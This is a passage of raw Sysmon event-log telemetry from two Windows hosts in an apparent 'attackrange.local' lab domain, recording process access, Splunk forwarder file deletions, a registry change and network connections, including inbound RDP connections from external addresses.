|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054863Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:01.464{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054862Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:01.464{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054861Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:01.464{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054860Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:01.464{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054859Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:01.464{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054858Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:01.464{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054857Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:01.464{5EBD8912-8CBD-6151-0500-00000000FD01}416432C:\Windows\system32\csrss.exe{5EBD8912-8CFD-6151-7900-00000000FD01}3816C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001054856Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:01.464{5EBD8912-8CC0-6151-1600-00000000FD01}12961780C:\Windows\system32\svchost.exe{5EBD8912-8CFD-6151-7900-00000000FD01}3816C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|c:\windows\system32\UBPM.dll+a7a1|c:\windows\system32\UBPM.dll+fa34|c:\windows\system32\UBPM.dll+cdcc|c:\windows\system32\UBPM.dll+d395|c:\windows\system32\UBPM.dll+dc95|c:\windows\system32\UBPM.dll+e9dd|c:\windows\system32\UBPM.dll+e0a4|c:\windows\system32\UBPM.dll+11662|c:\windows\system32\EventAggregation.dll+3fae|c:\windows\system32\EventAggregation.dll+3ea1|c:\windows\system32\EventAggregation.dll+36c9|c:\windows\system32\EventAggregation.dll+332f|c:\windows\system32\EventAggregation.dll+2e28|C:\Windows\SYSTEM32\ntdll.dll+65b55|C:\Windows\SYSTEM32\ntdll.dll+6585d|C:\Windows\SYSTEM32\ntdll.dll+656c0|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054855Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:01.464{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1600-00000000FD01}1296C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054854Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:01.464{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1600-00000000FD01}1296C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001054853Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:01.261{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0E23CD190D768749A933044035C0F877,SHA256=B94BADF43A74D49746664CF3AEABDAE1713850FD7FBA59D72813B811A712ABF6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000980695Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:21:01.617{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5569B01D5645D876C22EAFCA8E37B996,SHA256=D8FB8F6FFD19118F338DA6BE795EB61F1CC3F37630ADFF2C5917C50F532CE492,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054898Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:02.792{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=DD0072BE3F9B575E7379108C50E005AA,SHA256=8337EA95BF9396EBFB4C06AD04C91020F756DB5009E28A2D418A3AEF00403072,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054897Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:02.792{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B19B899B62FCCDBFB8058510BA72BA12,SHA256=07F304B17F9E9CA1E2727587339335309906B00D1071790F32E1FB6D317C4C06,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054896Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:02.792{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=67C0219FC2693F1B1530AE056339E91F,SHA256=7D6FF3EA6C6E801E7822222986D4E9ECCF44A5E4F4818D464C3499E9DAAFD2BD,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000980699Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:20:59.880{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-50010-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000980698Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:21:02.695{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E2525613E3E41FB22C9FC9364EE6023A,SHA256=998AED0D6C0C7C72699EEDA0242D20C94805547721CD061E9413444FA89F18BE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000980697Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:21:02.695{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F92B58E88D54FDF450F19564DA21D9FB,SHA256=DBE8EA49750DDDA27C1131024EDCA0C475AF632DEFC336F31EF58959B9859AF2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000980696Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:21:02.617{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=365EA10D9C7654D5689B27657176ED48,SHA256=A22593BEF61DE2D88D4A62857F7FF606AACCD5386702C0B7DCDB1E188CF71205,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000980703Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:21:03.957{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E2525613E3E41FB22C9FC9364EE6023A,SHA256=998AED0D6C0C7C72699EEDA0242D20C94805547721CD061E9413444FA89F18BE,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000980702Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:21:01.162{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-50839-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 354300x8000000000000000980701Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:21:01.160{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse212.102.34.245unn-212-102-34-245.datapacket.com30396-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000980700Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:21:03.676{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9B8B711C92F7A0361BCDFBC489AD6DC2,SHA256=E4A4C9B24D3F08AA5F55559F60F643B227B89A7DA000935AC5546D892F1C3BC8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000980704Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:21:04.692{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=87D5FE736B07C64A73CDA7589EA73526,SHA256=77F92B4F5B23FDDBF67D3971ABDC0D192E2F486A28020A7CEFDB736DDAC6C9A9,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001054901Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:03.154{5EBD8912-8CDC-6151-6E00-00000000FD01}2608C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local54188-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 13241300x80000000000000001054900Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:21:04.399{5EBD8912-8CC0-6151-1000-00000000FD01}440C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\Config\LastKnownGoodTimeQWORD (0x01d7b380-0xfedfece3) 23542300x80000000000000001054899Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:04.024{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=56A2FB61E2A4A2F6C59CC5779FC2B928,SHA256=B4E236222EE1D7526F26DCBDEBC540FA57C22BDC793C847E0A72B79C0455A999,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000980707Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:21:05.786{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=398568558BE895CF4EA5A02FFEB67B82,SHA256=FF8B3C50F514A1EE3FAD545AFFAFCFCB6B8FF8D212A6E04976E54906C8A51963,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001054906Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:03.766{5EBD8912-8CC0-6151-0F00-00000000FD01}300C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-59610-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x80000000000000001054905Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:05.414{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=94835CF5AB3A121407DBFE294E1C31C7,SHA256=C6E6C44387DCEFFA8C16EC3B6FDD9EFA7D6C2D4A954A4748A5980A3E2CB489A4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054904Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:05.414{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=50E478040ED4CA6EB0708F82F3235DD1,SHA256=64F26B377FC5AFF47F95B678EB8F0D2DA65EC64F23D536357F9431AEED30D776,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054903Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:05.102{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=DD0072BE3F9B575E7379108C50E005AA,SHA256=8337EA95BF9396EBFB4C06AD04C91020F756DB5009E28A2D418A3AEF00403072,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054902Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:05.055{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F1A1BD2F901B4CA94B94CCCBE517078A,SHA256=199A390388E5CE1E3B9E73C41AC347A8ED5BC34ACF674F5A3BA3179D0B6977B9,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000980706Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:21:01.814{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59505-false10.0.1.12-8000- 354300x8000000000000000980705Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:21:01.488{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse162.55.235.26static.26.235.55.162.clients.your-server.de51384-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000980708Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:21:06.848{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AF342CDE6EE714B72E22497E3770CAE4,SHA256=57107AA7794B318EBC57159EFA5B1CB990FAF508EB09E02014BC03B22DE63778,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001054909Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:05.597{5EBD8912-8CD0-6151-3000-00000000FD01}1956C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local54190-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8089- 354300x80000000000000001054908Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:05.587{5EBD8912-8CD0-6151-3000-00000000FD01}1956C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local54189-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8089- 23542300x80000000000000001054907Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:06.290{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E95B34AC07BD3FC13881B82CE486257A,SHA256=31F1E69053FD69DB02AB84BB3BC9FC5A2E7DF4F83C9C02FEC33667247C1CF299,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000980709Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:21:07.848{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=579BCC3A34812334E13A8D272557E1CC,SHA256=1743EDB6A4A28524C5DE6C761ADAB9D8D7F0DC51A0A6EA48395A9336B431235C,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001054911Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:06.554{5EBD8912-8CC0-6151-0F00-00000000FD01}300C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-53436-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x80000000000000001054910Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:07.525{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7AF1A0066546EC5DC4BFCA48C706DBB5,SHA256=ADE621F8870F8046854A82623C829E85F89A59F6F631F2EB76AFD23C45045B3D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000980710Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:21:08.879{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4D3784BA79D53872D42AB6981861B0F0,SHA256=6D91E9519DAF43F24C4333778CD01A82B59DA0A4FCC069F4EE401FB4E82BCE0C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054913Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:08.744{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=4C90E0E90A1733C47C10B64A5FEB3F6A,SHA256=511402C5256D3A177B53EDCE9774250ECE1AFC43C9D63C4D47D382021B1567FB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054912Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:08.603{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program 